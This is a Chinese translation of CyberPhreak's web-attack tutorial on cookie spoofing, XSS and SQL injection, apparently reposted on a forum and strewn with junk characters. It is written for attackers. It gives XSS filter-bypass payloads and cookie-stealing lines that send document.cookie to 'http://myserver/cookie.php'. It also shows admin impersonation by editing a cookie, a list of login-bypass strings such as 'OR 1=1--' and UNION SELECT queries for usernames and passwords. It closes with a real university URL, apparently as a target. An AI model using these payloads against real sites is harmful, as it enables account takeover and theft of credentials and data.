XSS & SQL注入

admin

XSS & SQL注入
. f3 \* {4 ~2 \! M9 r8 f) N% y1 N文章作者：CyberPhreak
译文作者：黯魂 [S.S.T]

4 U2 s$ g: j+ z5 i& e* _
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
1 F: \0 H8 A) m9 r: m6 LX Web Security - XSS & more X
; C# d# Q4 i8 B4 x2 C% _. _XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX


~介绍

5 L8 E, c, ~- p5 l0 x7 B2 H在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全.

% g& O$ N* J; E3 ?" uXXXXXXXXXXXXXXXXXXXXX
X Table OF Contents X
" Q% Z$ o6 R" Z$ vXXXXXXXXXXXXXXXXXXXXX

XXXXXXXXXXXXXXXXXXXX
X Cookie Editing X
X XSS X
X SQL Injection X
XXXXXXXXXXXXXXXXXXXX

4 J0 c- ?# D& m~什么是cookie
7 R4 D1 U: Z9 Z
cookie就是一块数据.一旦你浏览一个站点并且注册一个帐号,一个cookie就被设置以记录你的信息.cookie仅仅保存你登录的信息以使站点检测以前你是否登录过,如果不是,它就会检测你的用户名和密码的正确性,然后登录.比如说在一个夜总会,你买了一张票,他们就会给你一张卡.因此你可以进进出出而不用每次都买票.而cookies比你所能看到的要复杂得多.夜总会只能记住你一晚上,但是cookies却能记住你一辈子.
$ a0 A/ z8 A! C1 a1 ^
~警告&欺骗
& F! m& S( W. u
那么现在你知道了cookie是什么...你如何看待它们?事实上,cookie编辑(修改)是最简单的方法之一.只要有一个浏览器,你就能够查看和编辑cookies,并且只需要一些基础的javascript知识.打开你的浏览器然后随便去一个网站吧,登录...现在输入javascript:alert(document.cookie).这时你应该可以看见一个用户名和密码.然而大多数站点现在都不使用cookies,而使用sessions.很遗憾,sessions不能被修改(服务端可以),不像cookies,一旦你修改了一个cookie你就可以欺骗你自己.现在让我们开始欺骗...假设你看到了一个警告框并且看到一些像这样的内容:
! E$ a7 ~9 j9 g- m
  t! e  K+ M3 Bstrusername=cnsst;strpassword=cnsst
1 L" }8 e4 A1 O1 V( H. J, z
此时假设你知道'bitch'是一个管理员,可是你不知道密码. 由于脆弱的安全机制你不需要密码:javascript:void(document.cookie="strusername=bitch")
, T( ]/ i$ _! w4 g! W4 r现在输入:javascript:alert(document.cookie).那几乎非常接近cookie修改了...

~什么是XSS
8 ~3 E: F0 ~8 r
' A2 h& R* J$ H, U) lXSS,或者CSS,不管你更喜欢怎样称呼它,XSS(CSS)都代表着跨站脚本.基本上意思就是你能以任何方式注入脚本,来让它完成你想要做的.通过XSS你也可以截获输入信息,像用户名,密码以及cookies.这都将被讨论,所以接下来将会有很多例子,我们这篇文章应该能够帮你在XSS上发挥自己的创造力.
1 }3 `( b! J% w0 U% ]1 S! d! F
~为什么使用XSS

# }# @, u# V1 M% e很明显的问题,通过XSS你能在客户端和服务器端执行任何类型的脚本.然而XSS却不仅仅局限于执行脚本上,还能截获输入.输入类似:<input name="name" type="name">
你通过XSS截获输入,然后通过一个秘密文件把截获到的信息发送向你的站点.而这一切绝不是XSS所能实现的全部作用.XSS还能截获cookies.Cookies保存着有价值的信息,像用户名,密码等等.
5 R4 x" S; f. a" T$ \
$ Q" u- \* C# }: [2 ^- u~让我们开始吧…
, d" ^- ?' V( y" \. ^) o
我假定你知道html和javascript,而php知识也有帮助,但却不是必要的.让我们从这个php脚本开始.

XSS--跨站脚本&lt;html&gt;

$ x. Q: f- R& c& z8 I( E" b&lt;body&gt;
! {$ k% g* B9 {! o9 B& V; E
" u6 W, |# n6 b& V7 [% o+ s. x  P' B&lt;form action="" method="GET"&gt;

- k9 ^  r. `/ }7 P1 _1 X&lt;!-- 我使用的GET方法,因为当我们利用的时候更容易练习. --&gt;

Script: &lt;input name="name" type="name"&gt;
( ?$ d, }. S& X, a# M7 ?
0 v( U6 j, g5 D1 ?" ?/ t* N&lt;input type="submit" value="submit"&gt;

# K4 J# k$ t) Q1 D6 |8 x&lt;/form&gt;

8 b  {3 Y+ D  }8 z" O&lt;/body&gt;
, [( Z5 |  X) G! [2 F* j
&lt;/html&gt;
9 L, J% l: H  m* Z
4 a9 R6 I% ]) G" s" C3 Z

, a0 v' g: {( i$ z% G" V&lt;?php
9 _+ j- f& Q7 Q' W% K! ?* }
$name = $_GET['name'];
5 J$ r6 p! W) m6 Q5 n: `: F
1 J( ]+ E3 z6 Y( n" [echo("Hello $name");
; W1 U, F" ^! S1 t
?&gt;
复制代码OK,我们应该都知道上面的代码有什么用...这是一个非常奇怪的脚本,没有一个人会在自己的站点上使用它(至少我没见过),但是它对初学者理解原理却真的很有用.来看看我输入后所得到的信息:

cnsst
. R! V6 x2 Y9 y1 s. r3 G/ u"Hello cnsst!"

; z7 ~7 y- h- U$ k引号内的信息就是输出信息..注意看,现在我输入:
<script>alert(document.cookie)</script>

+ r1 {- g/ D/ w8 g5 Z2 W4 @7 P7 l那么它将会弹出document.cookie!所以它是易受XSS攻击的!

现在我们已经对XSS有了一点了解,那让我们理解它.首先,脚本做的是取得你的输入然后粘贴它.嗯...也就是说我们能输入任何数据.所以?等等...任何数据...好的,你想问客户端和服务器端分别有什么语言? 让我告诉你,基本上客户端语言是建立在你客户端浏览器之上的:JavaScript,html, VBScript等等...
- g) \& D% v0 B" h1 i
服务器端语言在另一边,不是建立在你客户端之上的,而建立在服务器之上,有php,asp等等...

已有一些方法注入php,稍后我将说明.现在先想想这怎样才能对我们有帮助?注入javascript?简单.比如说你正在编写一个网站程序,由于是你的站点,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因为XSS允许你让网站运行你想要运行的任何脚本.
, F  q, E2 m/ G! W
让我们看一个稍微复杂点的例子!
, m& c) u! c: t6 E( {9 S
假设你已经输入了<script>alert(document.cookie)</script>,并且回显是这样的:
scriptalert(document.cookie)/script
或者可能是这样的:
6 j/ Y: \" K( C7 Cscriptalertdocument.cookie/script
! K9 l/ f2 h0 o
可以看出更难利用了...不过有很多方法使用XSS,这只是其中一种.而且是其中最烂的方法之一.你看到当中的"<>"都被空字符" "替换了.

让我们继续利用:
<<script>>alert(document.cookie)<</script>>
& E" k$ c7 z7 Q5 w
你的输出将弹出document.cookie.

现在来看看更狠的:
<<script>>alert((document.cookie))<<//script>>

1 p* D1 e5 z4 F  f* F0 T; l& w
他们可能会替换所有的,或者只是"<>".所以如果一对不能得以执行,另一对就可以.现在,如果你看到:
1 x4 P2 W8 Y. \3 q  H/ s. }) G: \scriptalertdocument.cookie/script
或者 <<<script>>>alert(document.cookie)<<</script>>>  

6 a; w+ t6 U" \* T0 K) k( f& R他们可能替换2对来欺骗你,或者替换一些字母.试着用你自己的方法来利用...你输入:
<script>alert(document.cookie)</script>
2 e6 C, o- E; R! E" H- D/ s4 V
6 g* `8 ^5 s5 K输出像这样:srplert(document.cookie)srp
: j+ k/ y* f' k% o. P. V" V
仔细观察,你就会发现document.cookie中并没有什么被替换.为什么呢? 因为他们并不清楚你想要alert什么,以及你想做什么.所以他们只是猜测,就只阻止了"<>"以及script部分.怎么绕过?看看这个:
: r4 O- x$ |9 G; T0 G" i<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>

所有重复多余的部分刚好被替换!现在让我们来点更高级的!
$ B8 F+ ~6 _5 m6 R" I( h5 c
这次他们使用的仍然是替换,但是却检查了整个字符串!例如:
4 R) p, @: ]/ Y, y9 u* u; w6 ?<script>alert(document.cookie)</script>

输出将是:
) j. @2 r: ]9 H: h6 Zscriptalert(document.cookie)script

, [, N2 H2 g7 c8 I4 j看到这,你激动地说,"我知道该怎么做了!" OK,让我们按照你的方法来重新构造:
, x/ c' d  |- [<<script>>alert(document.cookie)<</script>>

输出:scriptalert(document.cookie)script. 这时你可能会继续增加更多的<>.可是,他们替换了任何"<>",无论你输入多少个...看到我说"任何"了吗?使用下面这个例子:
# v% R; t- J& U& n
<
script
>
# j7 T6 V2 N9 Salert
0 ]: g6 o+ J4 B+ a0 K  K(
document
+ _0 d. \4 g' G3 Z$ @% ?; j! |.
cookie
" u) A1 S8 c3 D$ Y  u% ])
<
/
script
! v) ]$ X- B: |3 q( G; K>

( w& u. {) z9 O* W& C
4 O7 I: p* z& z+ }! R看看它,它没有替换"<>",它替换代码关键字.所以即便你写的是一句没有"<>"的代码,将仍然被替换,这就是我们为什么这样写的原因.假如对方使用更严格的标准,替换任何类型的代码,甚至是"alert"! 我们又该怎么改进呢?看看这个:
9 p# g" [' m- ]& h* `0 t1 I<
s
c
r
i
9 m4 W: q1 C  `- E3 n9 ?3 ^- ip
! P0 }- H) Y# R6 |! M. v5 Rt
>
  b/ i4 H+ Z1 n' d$ u# q' m. Ja
* @8 Q( \0 f+ y, e, J5 {5 {1 Zl
: n( `6 {+ ~+ r% oe
r
# e4 S; e! T1 A) kt
(
d
o
c
u
m
e
n
t
5 [, E: L+ I, V: Z.
- `4 n/ A/ L, G  mc
, y- n# M- l7 i! b; {2 V4 H. K' co
9 p% @1 a! f( Lo
k
* r$ o# {. _* |i
e
0 B5 M0 {7 T/ w: H)
<
" t4 G* b# x4 `0 H9 E" t  R/
s
c
r
i
) J1 V: r3 q5 l4 e& hp
- v( }2 M6 U6 N( \' It
/
>
' n: Q4 v$ b* [
这下应该可以了,但是如果他们仍然替换"<",你可以增加2对"<< >>"(并且你可以用任何字符取代document.cookie)

还有更多我可以演示的替换,但是我教你的只是想让你发挥自己的创造力.
$ ~5 }! r* M! j2 n1 S7 S% \
, K& A3 `: g6 T2 a; V- C9 z; a现在让我来讲讲其他XSS方法.前面我们已经讨论了客户端XSS,那么现在就来看看服务器端XSS.
! {2 u( j* ~/ o: P. `
首先让我说明它们之间的区别.客户端是从你浏览器经解释语言,如JavaScript (JS) VBScript (VBS)等而看到的.服务器端XSS是通过来自服务器端的语言,如php,asp等的XSS.客户端通过浏览器查看,服务器端通过服务器查看.
' I, r' D: L4 e+ s% h8 S
我们已经学会了怎样构造客户端XSS,而构造服务器端我们必须注入脚本到服务器上.要完成这个,我们需要找到一个像任何XSS的脚本,但是这个脚本能够保存你的XSS到服务器中.现在,假设你在一个网站上发表了一篇文章,现在要做的是取代文章,用XSS,为什么我们应该用JavaScript?为什么不用php?但是先让我给你看点东西.
1 d! a' n" N' x$ xdocument.forms(0).action ="http://myserver/myscript.php
+ c$ X/ l( i3 U' J8 `这既能在服务器端也能在客户端,没有关系.因此你的脚本将复制他们所输入的信息到那个表单中,并保存在我们站点上的一个*.txt文件中.
9 S5 y5 Q. K! M/ x
1 v! X& k0 T" G, h, W' D再次假设你在网站上注册了一个帐号,并且可以自定义资料...
document.images(0).src="http://myserver/cookie.php"+document.cookie.
+ ^( q  l1 y. ^3 N3 C0 T0 p7 C或者如果你有空间可以存放指向自定义内容的链接,你可以输入:
* ~: k, t' z8 [( Vjavascript:location.href="http://myserver/cookie.php"+document.cookie
: L4 X9 V% \5 B! T% `这将截获访问我们资料的用户的cookie.这可以用于任何地方而不仅仅在资料上,它只是一个例子.

有时一个站点会回显你的UserAgent和Referer...现在让我们在DOS提示符下或者命令行窗口中试一试一些XSS,
. q" J# m7 [3 V$ ~2 Ntelnet example.com
& J7 a! `* L  [9 ^: E6 @GET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
User-Agent: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
4 p1 A) D( t( c+ UReferer: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
~什么是SQL注入
( ]6 k/ o1 P6 @+ l, y! c
SQL注入,网站中最大的安全问题之一.那么到底什么是SQL注入?其实也就是注入SQL.现在让我们来挖掘不同级别的SQL漏洞.假设你有一个像这样的登录页面:&lt;html&gt;

&lt;body&gt;
/ K  I) U4 c  N& b- E, r: o, {
&lt;form action="" method="POST"&gt;
8 e% Q+ X' o  D2 g0 K8 X3 W
% m1 s1 ^: q. b" w8 vUsername: &lt;input name="name" type="name"&gt;
) ]5 S) A! ^3 g0 l' J8 ~$ e% Z1 N
, P9 H" |( i  RPassword: &lt;input name="password" type="password"&gt;
) P7 T: o* i  @- Z! ^: V  ?: c
/ P" u7 l. K1 a2 x4 E&lt;input type="submit" type="submit" value="Submit"&gt;

&lt;/form&gt;

: v2 x$ Z1 W# m7 j&lt;/body&gt;

&lt;/html&gt;
复制代码这里面有一个XSS漏洞,但是不用担心它,没有办法猜出或者破解出密码.所以,我们该怎么办?SQL注入!
: I8 T8 v2 Z6 n# Y
, F' x" Z1 y( h# U& e+ v最简单的攻击是在用户名和密码那里输入"'".如果没有保护机制,此时你应该得到一个错误信息.如果你得到了,它就是极易受攻击的.可是错误信息毫无价值,除非你知道如何利用它.所以,我会给你一个你可以使用的注入列表,以便在你得到一个单引号的错误信息时使用.
) v2 M# C# Y# E/ D, A* _, }
* y9 o" Z6 C1 G- y'='
2 y* e8 Q4 G1 a7 m! J3 _' {0 j$ b: X1 `'OR 1=1--
# P4 o. h9 Y9 O, H8 ^'OR a=a--
'OR'

自从人们增强安全性以后,现在这些注入就很难发挥作用了,但是下面这个列表却是很多人在安全列表里没有注意到的:

: J% \  ?9 a& J- q( M'OR''='
" R* b( F8 ]" p. G& m5 ~8 I'OR"="
'OR'="
8 B4 k+ w# Z( H  g+ i'OR '="
'OR "='
6 g# V, I, ^. |5 ]+ ?, e'OR ''='
'OR '=''
3 C$ N1 |+ v( G7 ~) N- ^$ x# P'OR "=''
4 C- x7 B  l2 ^, c) v' r6 m) N'OR ''="


2 D" V- Z# V" g9 Y0 j- F, Y~
$ F- e' D) g8 b! }现在让我说明UNION ALL SELECT声明,这将选出数据库中的一个表...所显示的内容取决于你所选择的列.
UNION ALL SELECT username,password FROM users
9 t: h4 f% u0 I
这个查询语句将执行,但是….如果毫无作用呢?
UNION ALL SELECT username,password FROM users WHERE username='OR "='
AND password='OR "='
) A0 ^9 I/ @# t  E. Z8 O
, U! M, n8 S$ ?) p( X2 Z) D' U/ Z你可能使用其他字符来替代'OR "='以注入存在的注入点.可是首先考虑一下,你是怎么知道表名的?实际上,你发现了一个SQL漏洞,它给了你错误信息,而错误信息包含了表名.

一旦你发现了漏洞,你就会按照习惯去用类似'OR "='的方法去进行注入,以得到表名.有时候你想从表中查询一些有用的数据,你却不得不选择所有的表,因为你并不知道所要查询的数据在哪个表里.下面的例子中存在20个不同表名的表,你试图查询一个ip的列表:
6 x& s8 G% `+ `) yUNION ALL SELECT
ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
1 o& I1 J# Z) O) T2 TWHERE ip='OR''="
$ l5 l- s/ Y: A* ~# Q% b
现在你看到这个了吗?(我确信你已经看到了)
5 q, F0 J2 I4 o' C4 {5 r! shttp://example.com/index.php?article=34
那将浏览Id为34的文章...让我们用"'"替换34:
http://example.com/index.php?article='
! M! ^- u% v; {0 o

" H0 x& q8 |6 A$ Z; u7 g现在,记住我所说的,大多数人都没有意识到'所带来的不安全性,你总是能够尝试不同的注入方法,这里是一些例子:
http://example.com/index.php?article='
http://example.com/index.php?article='='
' U8 P/ J, b( V; Ghttp://example.com/index.php?article='OR 1=1--
http://example.com/index.php?article='OR a=a--
0 ]6 p# u1 A& K- z( t' fhttp://example.com/index.php?article='OR '="
http://example.com/index.php?article='OR "='
http://example.com/index.php?article='OR ''='
http://example.com/index.php?article='OR '=''
# z" ?* _# q( p  w3 |% k6 H0 Vhttp://example.com/index.php?article='OR''='
http://example.com/index.php?article='OR"'='
' D* }$ T$ v, D, ghttp://example.com/index.php?article='OR"''='

尽情发挥自己的创造力!
http://www.ie.tsinghua.edu.cn/notice/show.php?id=704